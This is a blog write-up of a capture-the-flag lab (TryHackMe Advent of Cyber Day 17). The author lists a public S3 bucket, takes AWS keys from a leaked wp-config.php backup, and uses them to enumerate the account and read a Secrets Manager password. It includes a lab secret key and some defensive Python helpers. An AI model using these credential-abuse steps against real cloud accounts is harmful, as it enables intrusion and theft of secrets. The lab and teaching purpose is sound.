Advent Of Cyber 3 - Day 17

Posted on Dec 17, 2021
tl;dr: AWS

Getting ready

Today's task is about exploring and exploiting AWS S3 buckets: using an exposed bucket to extract information, then using that information to gain further leverage.

Get the AWS CLI:

sudo apt install -y awscli

Verify that it works:

aws s3 ls s3://irs-form-990/ --no-sign-request

It should start printing a long list of dates and XML files; hit CTRL+C after a while, because the list is very long.

Downloading stuff

Using cURL or aws-cli:

aws s3 cp s3://irs-form-990/201101319349101615_public.xml . --no-sign-request

AWS recon

aws configure --profile (PROFILENAME)

This adds entries to .aws/config and .aws/credentials in the home directory.

After adding the access keys to the profile, commands can be executed with:

aws s3 ls --profile (PROFILENAME)

OBS! Never store a set of access keys in the default profile; keeping every set in a named profile makes it less likely that a command is run against the wrong account.

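To turn the advice above into something that can be checked, here is an added example (my own code, not from the write-up or from TryHackMe) that reads the two files aws configure --profile writes and reports which profiles hold static access keys. The file contents below are constructed samples with placeholder values, not real keys.

```python
# Added example, not part of the original write-up: audit the two files that
# `aws configure --profile` writes for static access keys sitting in the
# default profile. Standard library only; both inputs below are constructed.
import configparser
from typing import Dict, List

# Constructed ~/.aws/credentials. Values are placeholders, not real keys.
SAMPLE_CREDENTIALS = """\
[default]
aws_access_key_id = AKIAEXAMPLEDEFAULT00
aws_secret_access_key = EXAMPLEDEFAULTSECRET

[thm-day17]
aws_access_key_id = AKIAEXAMPLEDAY170000
aws_secret_access_key = EXAMPLEDAY17SECRET
"""

# Constructed ~/.aws/config. Note the "profile " prefix that the config file
# uses for named profiles, while the credentials file does not.
SAMPLE_CONFIG = """\
[default]
region = eu-west-1
output = json

[profile thm-day17]
region = us-east-1
"""


def _load(text: str) -> configparser.ConfigParser:
    # interpolation=None: secrets may contain '%', which configparser would
    # otherwise treat as an interpolation marker and choke on.
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def profiles_with_static_keys(credentials_text: str) -> List[str]:
    """Profiles in the credentials file that hold a long-lived key pair."""
    cp = _load(credentials_text)
    return [s for s in cp.sections() if cp.has_option(s, "aws_access_key_id")]


def default_profile_has_keys(credentials_text: str) -> bool:
    """True when [default] holds static keys: the situation the note above warns about."""
    return "default" in profiles_with_static_keys(credentials_text)


def config_profile_names(config_text: str) -> List[str]:
    """Profile names as the config file spells them ("profile X" -> "X")."""
    names = []
    for section in _load(config_text).sections():
        if section == "default":
            names.append("default")
        elif section.startswith("profile "):
            names.append(section[len("profile "):])
    return names


def audit(credentials_text: str, config_text: str) -> Dict[str, List[str]]:
    """Summarise what a reviewer wants to know about a workstation's AWS profiles."""
    keyed = profiles_with_static_keys(credentials_text)
    configured = config_profile_names(config_text)
    return {
        # Keys in [default] run whenever --profile is forgotten.
        "static_keys_in_default": ["default"] if "default" in keyed else [],
        # Profiles that have keys but no region/output settings of their own.
        "keyed_profiles_without_config": sorted(set(keyed) - set(configured)),
        "keyed_profiles": keyed,
    }


if __name__ == "__main__":
    print(audit(SAMPLE_CREDENTIALS, SAMPLE_CONFIG))
```

The split between the two files is the part people trip over: the credentials file names a profile [thm-day17], while the config file names the same profile [profile thm-day17], and only [default] is spelled the same way in both.
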
Other recon techniques:

Finding the account ID belonging to an access key: aws sts get-access-key-info --access-key-id AKIAEXAMPLE

Determining the Username the access key you’re using belongs to: aws sts get-caller-identity --profile (PROFILENAME)

Listing all the EC2 instances running in an account: aws ec2 describe-instances --output text --profile (PROFILENAME)

Listing all the EC2 instances running in an account in a different region: aws ec2 describe-instances --output text --region us-east-1 --profile (PROFILENAME)


Identifying a resource: every AWS resource has a unique identifier, the ARN, with the format arn:aws:<service>:<region>:<account_id>:<resource_type>/<resource_name>

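The one-line format above hides a few variants that matter when reading command output: the resource part can be type/name, type:name (Secrets Manager) or a bare name, IAM ARNs have an empty region, and S3 ARNs have no account ID and no resource type at all. Here is an added example parser (my own code, not from the write-up or from AWS) that handles those cases. The ARNs in the tests are the ones that appear later in this write-up, except for an example bucket name and user name, which are placeholders for values the write-up leaves out.

```python
# Added example, not from the original write-up: a parser for the ARN format
# quoted above that also handles the variants the one-line format hides.
# Standard library only.
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional


@dataclass(frozen=True)
class Arn:
    partition: str              # "aws", "aws-cn", "aws-us-gov"
    service: str                # "s3", "iam", "secretsmanager", ...
    region: str                 # empty for global services such as IAM, and for S3
    account_id: str             # empty for S3; "aws" for AWS-managed IAM policies
    resource_type: Optional[str]
    resource_name: str


def parse_arn(arn: str) -> Arn:
    # At most 5 splits: the resource part may itself contain ':' (e.g. secretsmanager).
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account_id, resource = parts
    if not partition or not service or not resource:
        raise ValueError(f"ARN is missing a mandatory field: {arn!r}")

    # The resource part is "type/name", "type:name" or just "name".
    # S3 is the exception: its resource is "bucket" or "bucket/key" with no type,
    # so a '/' there must not be read as a type separator.
    if service == "s3":
        return Arn(partition, service, region, account_id, None, resource)
    cut = min((resource.find(sep) for sep in "/:" if sep in resource), default=-1)
    if cut == -1:
        return Arn(partition, service, region, account_id, None, resource)
    return Arn(partition, service, region, account_id, resource[:cut], resource[cut + 1:])


def account_ids(arns: Iterable[str]) -> Dict[str, List[str]]:
    """Group ARNs by account. Useful when output from several commands is being
    checked against the single account that is actually in scope."""
    groups: Dict[str, List[str]] = {}
    for a in arns:
        groups.setdefault(parse_arn(a).account_id, []).append(a)
    return groups


if __name__ == "__main__":
    print(parse_arn("arn:aws:secretsmanager:eu-north-1:019181489476:secret:HR-Password-KIJEvK"))
```
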

The Grinch somehow got hold of too much information again, and we need to find out how.

The clue is an image HR sent out about a new portal site:


Looking at the source code, it links to:

<img src="" style="width:538px">

where the bucket seems to be:

Let's see if we can enumerate it a bit and list some more files.

└─$ aws s3 ls s3:// --no-sign-request

2021-11-13 16:06:51       6148 .DS_Store
2021-11-13 13:43:03     108420 0vF39p3.png
2021-11-27 12:55:21     705191 AWSConsole.png
2021-11-13 13:43:03       5652 aws-logo.png
2021-11-13 16:06:51         68 flag.txt
2021-11-13 16:06:51    2349068 flyer.png
2021-11-13 13:43:03      92531 presents.jpg
2021-11-13 13:43:03       4680 tree.png
2021-11-24 00:52:22   16556739

There seem to be a couple of interesting files; let's download them and analyze them further:

└─$ aws s3 cp s3:// ./ --recursive --no-sign-request
download: s3:// to ./flag.txt
download: s3:// to ./aws-logo.png
download: s3:// to ./.DS_Store
download: s3:// to ./tree.png
download: s3:// to ./presents.jpg
download: s3:// to ./0vF39p3.png
download: s3:// to ./AWSConsole.png
download: s3:// to ./flyer.png
download: s3:// to ./

Contents of flag.txt: It's easy to get your elves data when you leave it so easy to find!

The interesting file we want to investigate further is:

Unzip the file and go through its contents. Inside the unpacked folder is a file called wp-config.php, and it contains some juicy credentials:

/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', '');
define('S3_UPLOADS_SECRET', 'Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc');
define('S3_UPLOADS_REGION', 'us-east-1');

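A backup like this one is exactly what secret-scanning tools look for before an archive is published or a bucket is opened up. Here is an added example (my own code, not from the write-up, TryHackMe or any scanning tool) that applies the same heuristic to a constructed wp-config.php: flag AWS access key IDs by their AKIA/ASIA prefix, flag a 40-character secret that sits next to a "secret" label, and produce a redacted copy that is safe to paste into a ticket. Every key and secret in the sample is a placeholder.

```python
# Added example, not part of the original write-up: a small secret scanner
# for config files of the kind found in the backup above, plus a redaction
# helper. Standard library only; the sample file is constructed and every
# credential in it is a placeholder.
import re
from typing import List, NamedTuple


class Finding(NamedTuple):
    line_no: int
    kind: str
    value: str


# Access key IDs are 20 characters: a 4-character prefix (AKIA for long-lived
# keys, ASIA for temporary ones) followed by 16 upper-case alphanumerics.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[0-9A-Z]{16})\b")

# Secret access keys are 40 base64-style characters with no fixed prefix, so
# the heuristic is: a 40-character token within a short distance of the word
# "secret". Quotes around the token are optional so both PHP define() lines
# and INI-style credentials files are covered.
SECRET_RE = re.compile(
    r"(?i)secret.{0,40}?['\"]?([A-Za-z0-9/+=]{40})['\"]?(?![A-Za-z0-9/+=])"
)

# Constructed wp-config.php fragment; values are placeholders, not real keys.
SAMPLE_WP_CONFIG = """<?php
/* Add any custom values between this line and the "stop editing" line. */
define('S3_UPLOADS_BUCKET', 'example-bucket');
define('S3_UPLOADS_KEY', 'AKIAEXAMPLE0000000AA');
define('S3_UPLOADS_SECRET', 'EXAMPLEexampleEXAMPLEexampleEXAMPLE12345');
define('S3_UPLOADS_REGION', 'us-east-1');
define('DB_PASSWORD', 'Winter2021!');
"""


def scan(text: str) -> List[Finding]:
    """Return every access key ID and probable secret key, with its line number."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append(Finding(n, "aws_access_key_id", m.group(1)))
        for m in SECRET_RE.finditer(line):
            findings.append(Finding(n, "aws_secret_access_key", m.group(1)))
    return findings


def _mask(value: str) -> str:
    # Keep the first four characters so the finding is still recognisable.
    return value[:4] + "*" * (len(value) - 4)


def redact(text: str) -> str:
    """Copy of the text with every finding masked, safe for reports and tickets."""
    out = ACCESS_KEY_RE.sub(lambda m: _mask(m.group(1)), text)
    out = SECRET_RE.sub(lambda m: m.group(0).replace(m.group(1), _mask(m.group(1))), out)
    return out


if __name__ == "__main__":
    for f in scan(SAMPLE_WP_CONFIG):
        print(f.line_no, f.kind, _mask(f.value))
```

The DB_PASSWORD line deliberately goes unflagged: a generic password has no shape a regex can recognise, which is why scanners pair pattern matching with entropy checks or known-prefix lists rather than relying on one or the other.
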

Finding the AWS account ID the access key works with:

└─$ aws configure --profile thm-day17

AWS Secret Access Key [None]: Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc
Default region name [None]: us-east-1
Default output format [None]:

aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile thm-day17
    "Account": "019181489476"

Finding the username of the account:

aws sts get-caller-identity --profile thm-day17
    "UserId": "AIDAQI52OJVCFHT3E73BO",
    "Account": "019181489476",
    "Arn": "arn:aws:iam::019181489476:user/"


Finding the name of the EC2 instance:

aws ec2 describe-instances --output text --profile thm-day17

TAGS    aws:cloudformation:stack-id     arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7
TAGS    aws:cloudformation:logical-id   Instance
TAGS    created_by      Elf McHR
TAGS    aws:cloudformation:stack-name   HR-Portal
TAGS    Name    HR-Portal

The interesting parts are under TAGS, where we see that the Name tag is HR-Portal.

Finding the database password stored in Secrets Manager:

aws secretsmanager list-secrets --profile thm-day17
    "SecretList": [
            "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
            "Name": "HR-Password",                                               
            "Description": "Portal DB Secret",
            "LastChangedDate": 1637717347.812,
            "LastAccessedDate": 1639872000.0,
            "Tags": [
                    "Key": "aws:cloudformation:stack-name",
                    "Value": "HR-Portal" 
                    "Key": "aws:cloudformation:logical-id",
                    "Value": "FalseSecret"
                    "Key": "aws:cloudformation:stack-id",
                    "Value": "arn:aws:cloudformation:us-east-1:019181489476:stack/HR-Portal/5ebc4e90-447e-11ec-a711-12d63f44d7b7"
                    "Key": "created_by", 
                    "Value": "Elf McHR"
                    "Key": "Name",
                    "Value": "Payroll"
            "SecretVersionsToStages": {
                "70630b3c-4fbe-4a24-885d-18445bd808b1": [
                "a702190e-69f7-4a8a-81fd-3d20b486657a": [
            "CreatedDate": 1636807016.521

aws secretsmanager get-secret-value --secret-id HR-Password
    "ARN": "arn:aws:secretsmanager:us-east-1:019181489476:secret:HR-Password-8AkWYF",
    "Name": "HR-Password",
    "VersionId": "70630b3c-4fbe-4a24-885d-18445bd808b1",
    "SecretString": "The Secret you're looking for is not in this **REGION**. Santa wants to have low latency to his databases. Look closer to where he lives.",
    "VersionStages": [
    "CreatedDate": 1637717347.718

Sneaky Santa, keeping the DB close to home; time to find a data center closer to the North Pole. Secrets Manager is a regional service, so a secret with the same name can exist separately in every region. Going by the region list in the AWS docs, eu-north-1 should be closer to where Santa lives.

└─$ aws secretsmanager get-secret-value --secret-id HR-Password --region eu-north-1
    "ARN": "arn:aws:secretsmanager:eu-north-1:019181489476:secret:HR-Password-KIJEvK",
    "Name": "HR-Password",
    "VersionId": "f806c3cd-ea20-4a1a-948f-80927f3ad366",
    "SecretString": "Winter2021!",
    "VersionStages": [
    "CreatedDate": 1636809979.996

What a classic password :D : Winter2021!